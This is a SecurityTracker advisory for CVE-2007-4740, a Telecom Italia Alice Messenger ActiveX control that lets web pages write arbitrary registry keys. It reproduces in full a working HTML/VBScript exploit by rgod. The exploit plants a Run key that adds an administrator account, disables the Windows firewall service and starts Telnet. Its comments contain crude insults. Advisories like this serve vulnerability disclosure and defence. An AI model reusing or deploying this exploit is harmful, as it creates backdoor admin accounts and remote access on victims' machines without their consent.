Telecom Italia Alice Messenger ActiveX Control Lets Remote Users Modify Registry Settings
|
SecurityTracker Alert ID: 1018644 |
SecurityTracker URL: http://securitytracker.com/id/1018644
|
CVE Reference:
CVE-2007-4740
(Links to External Site)
|
Updated: Apr 15 2008
|
Original Entry Date: Sep 4 2007
|
Impact:
Modification of system information
|
Exploit Included: Yes
|
|
Description:
A vulnerability was reported in Alice Messenger. A remote user can cause registry settings to be modified on the target user's system.
A remote user can create specially crafted HTML that, when loaded by the target user, will invoke an ActiveX control and modify certain registry keys.
The CLSID of the vulnerable control is: 19092490-676B-4C06-A158-34F1CD2DE517
The original advisory and exploit is available at:
http://retrogod.altervista.org/telecom_regkey.html
rgod reported this vulnerability.
|
Impact:
A remote user can create HTML that, when loaded by the target user, will modify certain registry keys on the target user's system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: aiuto.alice.it/offerte/messenger/installazione.html (Links to External Site)
|
Cause:
Access control error
|
Underlying OS: Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Telecom Italy Alice Messenger Hp.Revolution.RegistryManager.dll
|
<!--
04.50 20/08/2007
Telecom Italy Alice Messenger Hp.Revolution.RegistryManager.dll (v.1)
remote arbitrary registry key manipulation
I mean this one:
http://aiuto.alice.it/offerte/messenger/installazione.html
this was 0day for a while, but ... who knows?
the new version suggests to remove this dll, you know telecom guy, because it sucks...
Object Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
rgod.
http://retrogod.altervista.org
-->
<html>
<object classid='clsid:19092490-676B-4C06-A158-34F1CD2DE517' id='HPRevolutionRegistryManager' /></OBJECT>
<script language='vbscript'>
group="HKEY_LOCAL_MACHINE"
section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
key="sun-tzu"
valType=1 'REG_SZ
value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess
start= disabled & net stop SharedAccess & sc config TlntSvr start= auto & net start TlntSvr & echo whatthefuck(!) & pause" 'you meretrix...
HPRevolutionRegistryManager.WriteRegistry group ,section ,key ,valType ,value 'die of miserable death mommy
</script>
</html>
original url: http://retrogod.altervista.org/telecom_regkey.html
|
|